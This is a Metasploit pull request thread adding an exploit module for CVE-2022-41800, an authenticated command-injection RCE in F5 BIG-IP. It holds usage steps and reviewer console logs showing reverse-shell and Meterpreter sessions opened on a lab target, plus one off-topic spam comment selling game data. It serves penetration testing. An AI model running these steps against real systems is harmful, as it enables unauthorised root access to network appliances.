F5 exploit module CVE-2022-41800 (authenticated RCE in RPM code)
rapid7/metasploit-framework pull request #17273
Opened 2022-11-16 20:29 UTC by rbowes-r7

Check in a module for CVE-2022-41800, which is an authenticated RCE in F5 BigIP. It requires a username/password, and grants a root shell.

This is particularly useful for testing post modules. :)

Everything is tested against F5 Big-IP 17.0.0.1, which is freely available as a VM image (with a free account). It's also in our "vulnerable software" directory.

## Verification

1. Install the application
2. Start `msfconsole`
3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
5. Do: `run`
6. You should get a session

2022-11-17 12:05 UTC, you5698116 commented
It is easy to negotiate the price of game data on tw.beanfun.com: Q178408841
要tw.beanfun.com游戏数据价格好谈：Q178408841

2022-11-21 20:19 UTC, smcintyre-r7 requested changes
Everything looks good to me, I tested the Python Meterpreter payload and a bash reverse shell which both worked.

The only changes that look necessary is to either remove the CmdStager mixin and references to ARCH_X86 and ARCH_X64 targets, or use the CmdStager mixin to support ARCH_X86 and ARCH_X64 targets. It's up to you if you want to support them, but if they're not going to work, they should be filtered out.

2022-11-21 20:19 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
> +  include Msf::Exploit::CmdStager
This doesn't look like it's actually used anywhere. There's no call to `execute_cmdstager`. It would however allow the `ARCH_X86` / `ARCH_X64` payloads to work. See my other comment regarding that.

2022-11-21 20:19 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
> +        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
I don't think `ARCH_X86` and `ARCH_X64` payloads are actually supported by this module. Probably because the command stager isn't used and down on L87, the raw shellcode is used in the same way as the OS command payloads are used.

I also tried a couple of different values, so if I missed something, just let me know which one I should be using:

```
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit PAYLOAD=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Exploit failed: JSON::GeneratorError source sequence is illegal/malformed utf-8
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit PAYLOAD=linux/x86/shell/reverse_tcp

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Exploit failed: JSON::GeneratorError source sequence is illegal/malformed utf-8
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit PAYLOAD=cmd/unix/python/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (24380 bytes) to 192.168.159.119
[+] Deleted /var/config/rest/node/tmp/ba8e44f2-73eb-4101-9c58-2b0039faf248.spec
[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/n60ifzB-5.1.2-0.0.1.noarch.rpm
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.119:38114) at 2022-11-21 15:06:35 -0500

meterpreter >
```
```suggestion
        'Arch' => [ARCH_CMD],
```

2022-11-21 20:19 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
> +      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
FYI this technically isn't required because you're intending for the user to set `HttpUsername` and `HttpPassword` which will provide HTTP basic and NTLM authenticaiton automatically.

Doing it the way you are though, saves the unauthenticated request that would return the 401 and causes the header to be present in the `HttpTrace` (avoiding a limitation that's currently in place that causes the second request to be silent).

No action necessary, just thought I'd mention that.

2022-11-23 22:56 UTC, smcintyre-r7 commented
Well I tested this and could reliably obtain the warning that the file failed to delete only when `MeterpreterTryToFork` is set to false, which you've already configured properly. In the case where Meterpreter isn't forking and it reports that the file wasn't delete, it appears as though the file doesn't exist.

```
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit MeterpreterTryToFork=true

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (24380 bytes) to 192.168.159.119
[+] Deleted /var/config/rest/node/tmp/052b962b-39bb-4fbe-b285-3d1204b7000e.spec
[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/G8hIBdX-6.9.0-9.6.2.noarch.rpm
[*] Meterpreter session 18 opened (192.168.159.128:4444 -> 192.168.159.119:58462) at 2022-11-23 17:50:32 -0500

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.119 - Meterpreter session 18 closed.  Reason: User exit
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit MeterpreterTryToFork=false

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (24380 bytes) to 192.168.159.119
[+] Deleted /var/config/rest/node/tmp/1c18b4d6-f790-4643-aeb9-0caa4f5e0f55.spec
[*] Meterpreter session 19 opened (192.168.159.128:4444 -> 192.168.159.119:59014) at 2022-11-23 17:50:39 -0500
[*] Waiting 5s before cleanup...
[!] This exploit may require manual cleanup of '/var/config/rest/node/tmp/RPMS/noarch/IZwK8-4.7.9-4.9.9.noarch.rpm' on the target

meterpreter > ls /var/config/rest/node/tmp/RPMS/noarch
No entries exist in /var/config/rest/node/tmp/RPMS/noarch
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.119 - Meterpreter session 19 closed.  Reason: User exit
msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) >
```

For that reason, I think it's safe to ignore the error based on my observations.

2022-11-23 22:57 UTC, smcintyre-r7 approved these changes

2022-11-23 22:58 UTC, merged

2022-11-23 23:04 UTC, smcintyre-r7 commented
# Release Notes
This adds an authenticated RCE for F5 devices that leverages the command injection flaw identified in CVE-2022-41800.